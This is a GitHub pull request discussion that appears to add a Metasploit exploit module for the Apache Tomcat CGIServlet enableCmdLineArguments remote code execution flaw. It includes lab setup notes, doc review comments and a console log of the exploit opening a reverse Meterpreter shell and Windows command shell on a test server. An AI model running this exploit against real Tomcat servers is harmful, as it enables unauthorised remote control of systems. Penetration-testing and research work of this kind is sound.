-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability #11990
Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability #11990
Conversation
I wouldn't mind taking this one,if you had someone else in mind or it was a priority feel free to replace me. |
Not a priority. Please take your time. Thanks! |
* 8.5.0 to 8.5.39 | ||
* 7.0.0 to 7.0.93 | ||
|
||
Also, the machine needs to enable the enableCmdLineArguments option in web.xml. For example: |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
conf\web.xml
(i like to wrap file names and paths in ticks)
Your bundle also includes that change. I attempted exploit against my own custom install and its failing (most likely a typo or user error on my behalf), but that instruction wasn't in the docs, but is required right? |
Yes I have that set to true. |
Your bundle worked, still trying to figure out why my manual didn't (so the docs can be adjusted if need be)
|
worked on 8.5.20 as well on my server 2012 box.
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
exploit working, some minor doc cleanups
documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md
Outdated
Show resolved
Hide resolved
6. Run the module, you should get a session. | ||
|
||
## Scenarios | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
### Apache Tomcat 9.0.17 with JDK 8 on Windows 10 Pro (x64)
|
||
* Windows 10 Pro (x64) | ||
* Apache Tomcat 9.0.17 | ||
* JDK 8 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
remove this addition infavor of the h3 commented above
* Apache Tomcat 9.0.17 | ||
* JDK 8 | ||
|
||
### Check Method |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
add an extra #
[+] 172.16.135.141:8080 - The target is vulnerable. | ||
``` | ||
|
||
### Code Execution |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Add an extra #
documentation/modules/exploit/windows/http/tomcat_cgi_cmdlineargs.md
Outdated
Show resolved
Hide resolved
meterpreter > | ||
[!] Make sure to manually cleanup the exe generated by the exploit | ||
``` | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Tomcat 8.5.20 with JDK 1.8.0_211-b12 on Windows 2012 (Build 9200)
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > check
[+] 2.2.2.2:8080 - The target is vulnerable.
msf5 exploit(windows/http/tomcat_cgi_cmdlineargs) > run
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Checking if 2.2.2.2 is vulnerable
[*] 2.2.2.2 seems vulnerable, what a good day.
[*] Command Stager progress - 6.95% done (6999/100668 bytes)
[*] Command Stager progress - 13.91% done (13998/100668 bytes)
[*] Command Stager progress - 20.86% done (20997/100668 bytes)
[*] Command Stager progress - 27.81% done (27996/100668 bytes)
[*] Command Stager progress - 34.76% done (34995/100668 bytes)
[*] Command Stager progress - 41.72% done (41994/100668 bytes)
[*] Command Stager progress - 48.67% done (48993/100668 bytes)
[*] Command Stager progress - 55.62% done (55992/100668 bytes)
[*] Command Stager progress - 62.57% done (62991/100668 bytes)
[*] Command Stager progress - 69.53% done (69990/100668 bytes)
[*] Command Stager progress - 76.48% done (76989/100668 bytes)
[*] Command Stager progress - 83.43% done (83988/100668 bytes)
[*] Command Stager progress - 90.38% done (90987/100668 bytes)
[*] Command Stager progress - 97.34% done (97986/100668 bytes)
[*] Sending stage (179779 bytes) to 2.2.2.2
[*] Command Stager progress - 100.02% done (100692/100668 bytes)
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49612) at 2019-06-24 20:44:45 -0400
meterpreter >
[!] Make sure to manually cleanup the exe generated by the exploit
dir
Listing: C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi
=====================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2019-06-24 20:44:19 -0400 %SystemDrive%
100777/rwxrwxrwx 73802 fil 2019-06-24 20:44:19 -0400 dKASF.exe
100777/rwxrwxrwx 67 fil 2019-06-20 21:52:49 -0400 example.bat
100777/rwxrwxrwx 69 fil 2019-06-24 15:15:13 -0400 test.bat
meterpreter > sysinfo
Computer : WIN-EDKFSE5QPAB
OS : Windows 2012 (Build 9200).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: WIN-EDKFSE5QPAB\Administrator
meterpreter > shell
Process 3256 created.
Channel 1 created.
Microsoft Windows [Version 6.2.9200]
(c) 2012 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\webapps\ROOT\WEB-INF\cgi>cd ..\..\..\..\bin
cd ..\..\..\..\bin
C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>catalina.bat version
catalina.bat version
Using CATALINA_BASE: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_HOME: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20"
Using CATALINA_TMPDIR: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\temp"
Using JRE_HOME: "C:\Program Files\Java\jdk1.8.0_211"
Using CLASSPATH: "C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\bootstrap.jar;C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin\tomcat-juli.jar"
Server version: Apache Tomcat/8.5.20
Server built: Aug 2 2017 21:35:49 UTC
Server number: 8.5.20.0
OS Name: Windows Server 2012
OS Version: 6.2
Architecture: amd64
JVM Version: 1.8.0_211-b12
JVM Vendor: Oracle Corporation
C:\Users\Administrator\Desktop\apache-tomcat-8.5.20\bin>
Ok. Awesome. I'll make the changes today. Thanks for testing! |
There's a few minor doc things, but honestly it'll take me less time to change it when landing. Should be able to wrap this up over the weekend! |
Release NotesThis PR adds an exploit for Apache Tomcat on Windows when the cmdlineargs is configured (non-default) |
Description
This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the enableCmdLineArguments setting is set to true, a remote user can abuse this to execute system commands, and gain remote code execution.
Setup
Prepare a Windows box with JDK8 on it. You also want to make sure the box has the JAVA_HOME environment variable configured. For example:
To help you speed up the process, I have uploaded the actual vulnerable tomcat setup that you can use:
apache-tomcat-9.0.17.zip
To use it, simply download and extract it on the Windows machine. Go to the bin directory and execute the startup.bat file.
Note that I also created a debugging port for this tomcat on 4000, so if you want, you can attach IntelliJ and observe the tomcat internals more for analysis reasons.
The cgi script should be located at: http://IP:8080/cgi/test.bat
Verification
Demo: